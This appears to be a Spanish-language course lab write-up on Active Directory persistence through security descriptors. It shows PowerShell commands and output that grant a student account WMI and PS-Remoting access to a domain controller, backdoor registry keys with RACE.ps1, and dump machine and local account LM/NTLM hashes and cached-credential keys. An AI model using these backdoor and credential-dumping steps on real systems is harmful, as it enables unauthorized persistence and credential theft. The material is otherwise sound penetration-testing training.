Learning Objective - 13

Security Descriptors

Set-RemoteWMI

Ejecutamos gwmi para verificar si tenemos permisos para ejecutar consultas wmi en el dc.

PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc
gwmi : Access is denied.
At line:1 char:1
+ gwmi -class win32_operatingsystem -ComputerName dcorp-dc
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

Ahora agregamos el ACL

PS C:\ad\Tools> Set-RemoteWMI -SamAccountName student723 -ComputerName dcorp-dc -verbose
VERBOSE: Existing ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)
VERBOSE: Existing ACL for DCOM is
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)
VERBOSE: New ACL for namespace root is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-
1-5-21-719815819-3726368948-3917688648-13603)
VERBOSE: New ACL for DCOM
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-991631256)(A;;CCDCLCSWR
P;;;S-1-5-21-719815819-3726368948-3917688648-13603)

Luego realizamos de nuevo la consulta.

PS C:\ad\tools> gwmi -class win32_operatingsystem -ComputerName dcorp-dc


SystemDirectory : C:\Windows\system32
Organization    :
BuildNumber     : 20348
RegisteredUser  : Windows User
SerialNumber    : 00454-30000-00000-AA745
Version         : 10.0.20348

Set-RemotePSRemoting

Intentamos obtener una shell usando EnterPSSession

PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
Enter-PSSession : Connecting to remote server dcorp-dc failed with the following error message : Access is denied. For
more information, see the about_Remote_Troubleshooting Help topic.
At line:1 char:1
+ Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (dcorp-dc:String) [Enter-PSSession], PSRemotingTransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

Ahora agregamos el ACL.

PS C:\ad\Tools> Set-RemotePSRemoting -SamAccountName student723 -ComputerName dcorp-dc -Verbose
[dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has
been aborted because of either a thread exit or an application request. For more information, see the
about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

No le demos importancia al error e intentemos obtener la powershell remota de nuevo.

PS C:\ad\tools> Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-dc]: PS C:\Users\student723\Documents>

Y funcionó :D.

Add-RemoteRegBackdoor

Agregamos registros para poder extraer informacion:

PS C:\ad\Tools> Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student723 -Verbose
VERBOSE: [dcorp-dc : ] Using trustee username 'student723'
VERBOSE: [dcorp-dc] Remote registry is not running, attempting to start
VERBOSE: [dcorp-dc] Attaching to remote registry through StdRegProv
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103
 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with
user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the
key with the newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the
newly created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS)
and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly
 created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and
 AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly
created Ace
VERBOSE: [dcorp-dc : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [dcorp-dc : SECURITY] Backdooring started for key
VERBOSE: [dcorp-dc : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SECURITY] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SECURITY] Applying Trustee to new Ace
VERBOSE: [dcorp-dc : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SECURITY] Backdooring completed for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'student723'
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At C:\ad\Tools\RACE.ps1:2268 char:13
+             $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [dcorp-dc : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [dcorp-dc] Backdooring completed for system

ComputerName BackdoorTrustee
------------ ---------------
dcorp-dc     student723

Ahora podemos extraer info como:

Extraer el hash del computador.

PS C:\AD\Tools> . .\RACE.ps1
PS C:\AD\Tools> Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C

ComputerName MachineAccountHash
------------ ------------------
dcorp-dc     ef7a661f7edb7f5a1be191640342d6b7

Extraer hash de las cuentas locales.

PS C:\AD\Tools> Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: HBootKey : 3A7C1B66C61B8E967267FA0CB9D560265774BB4ACA899D52D1DC5ADD11C20C19


ComputerName : dcorp-dc
UserName     : Administrator
UserRID      : 500
UserLMHash   : f618da2acca75dbd3afd9486927b2f05
UserNTLMHash : 24275a16f48a1ad2580f4146ba1d192c

ComputerName : dcorp-dc
UserName     : Guest
UserRID      : 501
UserLMHash   : c09e6e3be671fbc51afb1722e5777af5
UserNTLMHash : f269747c02eebd676a1e8221ad80bc74

ComputerName : dcorp-dc
UserName     : DefaultAccount
UserRID      : 503
UserLMHash   : 61b3c0708bd8d8dc4be7dba6056eb71e
UserNTLMHash : 8f049f1b7806434b7cdf2821a375eec8

ComputerName : dcorp-dc
UserName     : WDAGUtilityAccount
UserRID      : 504
UserLMHash   : aad3b435b51404eeaad3b435b51404ee
UserNTLMHash : 31d6cfe0d16ae931b73c59d7e0c089c0

Las domain cached credentials.

PS C:\AD\Tools> Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
VERBOSE: Bootkey/SysKey : BAB78ACD91795C983AEF0534E0DB38C7
VERBOSE: LSA Key        : BDC807FEC0BB38EB0AE338451573904220F8B69404F719BDDB03F8618E84005C
VERBOSE: NL$KM Key     : 21 55 A8 F7 64 DD 9A FA 80 95 0F 03 E8 E4 76 5E 11 34 99 56 DE 62 E1 00 C6 FD 7D B8 14 AF 4F
73 58 C1 68 E3 16 E2 04 98 93 A5 39 C6 1B 7A E4 19 FE E6 EF DC 73 64 72 8C F9 2A F2 5C 68 D2 DB 73

PreviousLearning Objective - 12 NextLearning Objective - 14

Last updated 1 year ago